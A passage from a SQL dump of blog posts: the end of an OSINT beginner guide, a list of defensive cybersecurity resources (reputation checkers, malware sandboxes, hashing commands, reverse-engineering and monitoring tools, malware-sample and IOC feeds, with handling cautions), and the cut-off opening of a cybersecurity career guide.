class=\"font-bold\">Stay Ethical</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure compliance with legal regulations and respect privacy boundaries. Avoid accessing restricted or unauthorized data at all costs.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cross-Verify Sources</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Always double-check the accuracy of the information by validating it with multiple reputable sources.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Keep Learning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT tools and techniques constantly evolve. 
Stay updated with changes to remain at the cutting edge.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Applications of OSINT Across Industries</h2>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Cybersecurity</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use OSINT to monitor potential dangers like cyberattacks or phishing attempts.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Business Intelligence</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Quickly gather competitive intelligence to assess market trends or study competitors’ online activity.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Investigative Journalism</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Journalists rely on OSINT to verify claims, uncover important facts, and gather evidence for breaking news stories.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 
[&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Academic Research</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Academics can gather and analyze open-source data to study societal trends, public opinion, or economic changes.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why OSINT is Crucial in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of cyber threats, OSINT has become increasingly integral in identifying email scams, phishing attempts, or even insider threats. Attackers run exactly the same searches during reconnaissance (the MITRE ATT&amp;CK Reconnaissance tactic, e.g. T1593 Search Open Websites/Domains and T1589 Gather Victim Identity Information), so a defender should periodically run OSINT against their own organisation: exposed documents, leaked credentials, staff profiles that enable spear-phishing, and forgotten internet-facing assets. Utilizing OSINT this way strengthens an organization’s defenses and keeps its team one step ahead of attackers.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Becoming proficient in OSINT doesn’t happen overnight. It’s a skill that requires patience, constant practice, and ethical responsibility. Whether you’re a cybersecurity enthusiast, journalist, or business leader, mastering OSINT equips you to uncover valuable insights from the wealth of information available online.</p>', '', NULL, NULL, 1, 'draft', '2024-08-03 05:47:08', '2026-01-12 21:41:44', 'OSINT Tool', 'What is OSINT? A Comprehensive Guide for Beginners', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(116, 'Essential Cybersecurity Resources for Professionals', 'essential-cybersecurity-resources-for-professionals', 'As threats evolve, staying informed is crucial. Here\'s a comprehensive list of tools to enhance your cybersecurity arsenal.\r\n<p><strong>Before you submit anything:</strong> most of the online services below are shared platforms. A file, URL or hash you submit to a public scanner or sandbox is typically visible to other users and to vendors, and a URL scan actually visits the link. Do not upload confidential documents or internal tooling; look the hash up first and only upload the sample if no report exists; and in a targeted-attack investigation assume the adversary may be watching public feeds for their own artefacts. Use a private-submission tier or an on-premises sandbox when that matters.</p>\r\n<strong>1. IP &amp; URL Reputation</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>VirusTotal</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/gui/home/upload\" target=\"_blank\" rel=\"nofollow noopener\">https://www.virustotal.com/gui/home/upload</a> - Analyzes files and URLs to detect malware and other threats using multiple antivirus engines.</li>\r\n 	<li>🌀 <strong>URLScan.io</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlscan.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlscan.io</a> - Scans and analyzes websites to identify potentially malicious content and detailed site activity.</li>\r\n 	<li>🌀 <strong>AbuseIPDB</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://abuseipdb.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://abuseipdb.com</a> - Allows reporting and checking IP addresses associated with malicious activity to combat abuse.</li>\r\n 	<li>🌀 <strong>Cisco Talos</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://talosintelligence.com/reputation_center/\" 
target=\"_blank\" rel=\"nofollow noopener\">https://talosintelligence.com/reputation_center/</a> - Provides threat intelligence and research to help detect and respond to security threats.</li>\r\n 	<li>🌀 <strong>IBM X-Force</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://exchange.xforce.ibmcloud.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://exchange.xforce.ibmcloud.com/</a> - Offers threat intelligence, incident response, and research services to protect against global threats.</li>\r\n 	<li>🌀 <strong>Palo Alto Networks URL Filtering</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlfiltering.paloaltonetworks.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlfiltering.paloaltonetworks.com/</a> - Controls web access and blocks malicious websites to protect users.</li>\r\n 	<li>🌀 <strong>Symantec URL Filtering</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://sitereview.symantec.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://sitereview.symantec.com/</a> - Blocks access to websites based on reputation and categorization to prevent web-based threats.</li>\r\n 	<li>🌀 <strong>IPVoid</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ipvoid.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://ipvoid.com</a> - Provides information about IP 
addresses, including geolocation and abuse reports.</li>\r\n 	<li>🌀 <strong>URLVoid</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlvoid.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlvoid.com</a> - Analyzes websites for potential malicious activity using multiple blacklists and reputation services.</li>\r\n</ul>\r\n<strong>2. File | Hash | Search | Analysis | Sandboxing</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>File Extension</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://filesec.io/#\" target=\"_blank\" rel=\"nofollow noopener\">https://filesec.io/#</a> - Identifies file types based on their extensions.</li>\r\n 	<li>🌀 <strong>LOLBAS</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://lolbas-project.github.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://lolbas-project.github.io/</a> - Documents legitimate Windows binaries that can be abused by attackers.</li>\r\n 	<li>🌀 <strong>GTFOBins</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://gtfobins.github.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://gtfobins.github.io/</a> - Similar to LOLBAS, but for Unix-based systems.</li>\r\n 	<li>🌀 <strong>File Hash Check</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark 
dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.virustotal.com/gui/home/upload\" target=\"_blank\" rel=\"nofollow noopener\">https://www.virustotal.com/gui/home/upload</a> - Searching a SHA256 (or MD5/SHA1) hash returns any existing VirusTotal report for that exact file, so you can check a sample without uploading or sharing it. A hash only matches a byte-for-byte copy; a one-byte change yields a different hash and no hit.</li>\r\n 	<li>🌀 <strong>Hash Search</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.hybrid-analysis.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.hybrid-analysis.com/</a> - Searches for information about file hashes to identify malware.</li>\r\n 	<li>🌀 <strong>MetaDefender</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://metadefender.opswat.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://metadefender.opswat.com/</a> - Uses multiple scanning engines to detect and block various types of malware.</li>\r\n 	<li>🌀 <strong>Kaspersky Threat Intelligence</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://opentip.kaspersky.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://opentip.kaspersky.com/</a> - Provides information on emerging threats.</li>\r\n 	<li>🌀 <strong>Cuckoo Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://cuckoosandbox.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://cuckoosandbox.org</a> - An open-source 
automated malware analysis system. The original project has not been maintained for several years; for a new deployment look at an actively maintained successor such as CAPE Sandbox (CAPEv2) or Cuckoo3.</li>\r\n 	<li>🌀 <strong>AnyRun</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://any.run/\" target=\"_blank\" rel=\"nofollow noopener\">https://any.run</a> - An online, interactive malware analysis sandbox service; submissions on the free tier are public.</li>\r\n 	<li>🌀 <strong>Hybrid-Analysis</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.hybrid-analysis.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.hybrid-analysis.com/</a> - Provides detailed reports on suspicious files.</li>\r\n 	<li>🌀 <strong>Joe Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.joesandbox.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.joesandbox.com/</a> - A commercial malware analysis sandbox solution.</li>\r\n 	<li>🌀 <strong>VMRay Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://vmray.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://vmray.com</a> - Another commercial malware analysis sandbox.</li>\r\n 	<li>🌀 <strong>Triage</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tria.ge/\" target=\"_blank\" rel=\"nofollow noopener\">https://tria.ge</a> - An online malware analysis 
service.</li>\r\n 	<li>🌀 <strong>Browser Sandbox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.browserling.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.browserling.com/</a> - Runs websites in a controlled, isolated environment.</li>\r\n</ul>\r\n<strong>3. File Hash</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>HashTools (Windows)</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.binaryfortress.com/HashTools/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.binaryfortress.com/HashTools/</a> - Generates and verifies file hashes on Windows.</li>\r\n 	<li>🌀 <strong>QuickHash (macOS)</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://quickhash-gui.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://quickhash-gui.org/</a> - Generates file hashes on macOS.</li>\r\n 	<li>🌀 <strong>PowerShell</strong>:\r\n<div class=\"w-full max-w-[90vw]\">\r\n<div class=\"codeWrapper text-textMainDark selection:!text-superDark selection:bg-superDuper/10 bg-offset dark:bg-offsetDark my-md relative flex flex-col rounded font-mono text-sm font-extralight\">\r\n<div>\r\n<div class=\"text-textOff dark:text-textOffDark bg-offsetPlus dark:bg-offsetPlusDark py-xs px-sm z-10 inline-block rounded-br rounded-tl-[3px] font-thin\">powershell</div>\r\n</div>\r\n<div class=\"sc-gEvEer dOoSxI\"><code>Get<span class=\"token operator\">-</span>FileHash <span class=\"token operator\">-</span>Path C:\\path\\to\\file<span class=\"token 
punctuation\">.</span>txt <span class=\"token operator\">-</span>Algorithm SHA256\r\nGet<span class=\"token operator\">-</span>FileHash <span class=\"token operator\">-</span>InputObject ([IO.MemoryStream]::new([Text.Encoding]::UTF8.GetBytes(<span class=\"token\">\"This is a string\"</span>))) <span class=\"token operator\">-</span>Algorithm SHA256\r\n<span class=\"token comment\"># SHA256 is the default and the right choice for integrity checks; use -Algorithm MD5 only to match a legacy IOC list.</span>\r\n<span class=\"token comment\"># -InputObject expects a Stream, not a string, hence the MemoryStream wrapper above.</span>\r\n</code>\r\n🌀 <strong>Terminal (macOS / Linux)</strong>:</div>\r\n</div>\r\n</div></li>\r\n 	<li>\r\n<div class=\"w-full max-w-[90vw]\">\r\n<div class=\"codeWrapper text-textMainDark selection:!text-superDark selection:bg-superDuper/10 bg-offset dark:bg-offsetDark my-md relative flex flex-col rounded font-mono text-sm font-extralight\">\r\n<div>\r\n<div class=\"text-textOff dark:text-textOffDark bg-offsetPlus dark:bg-offsetPlusDark py-xs px-sm z-10 inline-block rounded-br rounded-tl-[3px] font-thin\">text</div>\r\n</div>\r\n<div class=\"sc-gEvEer dOoSxI\"><code>shasum -a 256 filename      # macOS\r\nsha256sum filename          # Linux (coreutils)\r\n</code></div>\r\n</div>\r\n</div></li>\r\n</ul>\r\n<strong>4. Find Suspicious Artifacts | Reverse Engineer | Debug Files</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>PeStudio</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.winitor.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://www.winitor.com/</a> - Static triage of Windows executables: surfaces suspicious imports, strings, sections and other indicators without running the file.</li>\r\n 	<li>🌀 <strong>CFF Explorer</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ntcore.com/?page_id=388\" target=\"_blank\" rel=\"nofollow noopener\">https://ntcore.com/?page_id=388</a> - Inspects and modifies the structure of Windows executable files.</li>\r\n 	<li>🌀 <strong>DocGuard</strong>: <a class=\"break-word hover:text-super hover:decoration-super 
dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docguard.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://docguard.io</a> - Analyzes document files for potential malicious content.</li>\r\n 	<li>🌀 <strong>File Scan</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.filescan.io/scan\" target=\"_blank\" rel=\"nofollow noopener\">https://www.filescan.io/scan</a> - Scans files for malware.</li>\r\n 	<li>🌀 <strong>Ghidra</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ghidra-sre.org/\" target=\"_blank\" rel=\"nofollow noopener\">https://ghidra-sre.org</a> - An open-source reverse engineering tool.</li>\r\n 	<li>🌀 <strong>IDA Pro</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://hex-rays.com/ida-pro/\" target=\"_blank\" rel=\"nofollow noopener\">https://hex-rays.com/ida-pro/</a> - A commercial reverse engineering tool.</li>\r\n 	<li>🌀 <strong>Radare2/Cutter</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://rada.re/n/radare2.html\" target=\"_blank\" rel=\"nofollow noopener\">https://rada.re/n/radare2.html</a> and <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font 
underline-offset-1 transition-all duration-300\" href=\"https://cutter.re/\" target=\"_blank\" rel=\"nofollow noopener\">https://cutter.re/</a> - Open-source tools for reverse engineering and analyzing software.</li>\r\n</ul>\r\n<strong>5. Monitor System Resources | Detect Malware</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>Process Hacker</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://processhacker.sourceforge.io/\" target=\"_blank\" rel=\"nofollow noopener\">https://processhacker.sourceforge.io/</a> - Monitors and manages running processes on Windows.</li>\r\n 	<li>🌀 <strong>Process Monitor</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\" target=\"_blank\" rel=\"nofollow noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/procmon</a> - Monitors and analyzes system activity on Windows.</li>\r\n 	<li>🌀 <strong>ProcDot</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://procdot.com/\" target=\"_blank\" rel=\"nofollow noopener\">https://procdot.com</a> - Visualizes and analyzes process activity on Windows.</li>\r\n 	<li>🌀 <strong>Autoruns</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\" target=\"_blank\" rel=\"nofollow 
noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</a> - Identifies and manages startup programs and services on Windows.</li>\r\n 	<li>🌀 <strong>TcpView</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview\" target=\"_blank\" rel=\"nofollow noopener\">https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview</a> - Monitors network connections on Windows.</li>\r\n</ul>\r\n<strong>6. Web Proxy</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>Fiddler</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.telerik.com/fiddler\" target=\"_blank\" rel=\"nofollow noopener\">https://www.telerik.com/fiddler</a> - A web debugging proxy tool for monitoring and analyzing web traffic.</li>\r\n</ul>\r\n<strong>7. 
Malware Samples</strong>\r\n<ul class=\"list-disc pl-8\">\r\n 	<li>🌀 <strong>MalwareBazaar</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://bazaar.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://bazaar.abuse.ch</a> - Provides access to live malware samples for analysis. Download and detonate them only inside an isolated, snapshotted lab VM with no route to your production network; never unpack a sample on your day-to-day workstation.</li>\r\n 	<li>🌀 <strong>FeodoTracker</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://feodotracker.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://feodotracker.abuse.ch/</a> - Tracks and provides information on Feodo botnet activity.</li>\r\n 	<li>🌀 <strong>SSLBlacklist</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://sslbl.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://sslbl.abuse.ch</a> - Lists SSL/TLS certificates used by malware command-and-control infrastructure.</li>\r\n 	<li>🌀 <strong>URLHaus</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlhaus.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://urlhaus.abuse.ch</a> - Collects and shares URLs used for malware distribution. Treat every listed URL as hostile and do not open one outside a sandbox.</li>\r\n 	<li>🌀 <strong>ThreatFox</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://threatfox.abuse.ch/\" target=\"_blank\" rel=\"nofollow 
noopener\">https://threatfox.abuse.ch</a> - Provides indicators of compromise (IOCs) for threat intelligence.</li>\r\n 	<li>🌀 <strong>YARAify</strong>: <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://yaraify.abuse.ch/\" target=\"_blank\" rel=\"nofollow noopener\">https://yaraify.abuse.ch</a> - Offers YARA rules for malware detection.</li>\r\n</ul>\r\nThese resources are invaluable for threat intelligence, malware analysis, and maintaining a strong security posture.', '', NULL, NULL, 1, 'draft', '2024-08-01 03:36:42', '2026-01-12 21:41:44', 'OSINT Tool', 'Essential Cybersecurity Resources for Professionals', '', NULL),
(117, 'A Comprehensive Guide to Starting Your Cybersecurity Career', 'a-comprehensive-guide-to-starting-your-cybersecurity-career', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you excited about starting a career in cybersecurity but feeling unsure where to begin? Cybersecurity offers endless opportunities, but launching your career in this high-demand industry can seem daunting without the right guidance. This detailed blog post will take you step-by-step through the process of building a strong foundation, developing practical skills, and getting real-world experience to successfully kickstart your cybersecurity career.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re completely new to IT or already have some technical experience, this guide will set you on the path toward becoming a cybersecurity expert.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Choose a Career in Cybersecurity?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become one of the most critical fields in today’s digital age. With cyber threats increasing in frequency and sophistication, companies are constantly looking for skilled professionals to safeguard their systems. According to the U.S. Bureau of Labor Statistics, jobs in this field are projected to grow by 35% between 2021-2031.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re looking for a stable, high-paying career with varied opportunities, venturing into cybersecurity might just be the perfect decision.\r\n\r\n</p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">1. 
General Foundational Skills</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A solid foundation in IT basics is essential when entering any tech-related career. If you’re starting from scratch, <b><strong class=\"font-bold\">Cisco Networking Academy</strong></b> offers an excellent free training program with 8 courses to develop your foundational understanding.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These introductory courses are perfect for beginners with zero technical knowledge, as well as individuals looking to refresh their computer and networking basics. Invest time here to establish an essential skill set and get comfortable exploring IT systems. <strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/m/en_sg/partners/cisco-networking-academy/index.html\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Networking Academy</a></strong></p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">2. First Cyber Focus Course</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve covered the basics, it’s time to focus on your first cybersecurity training. 
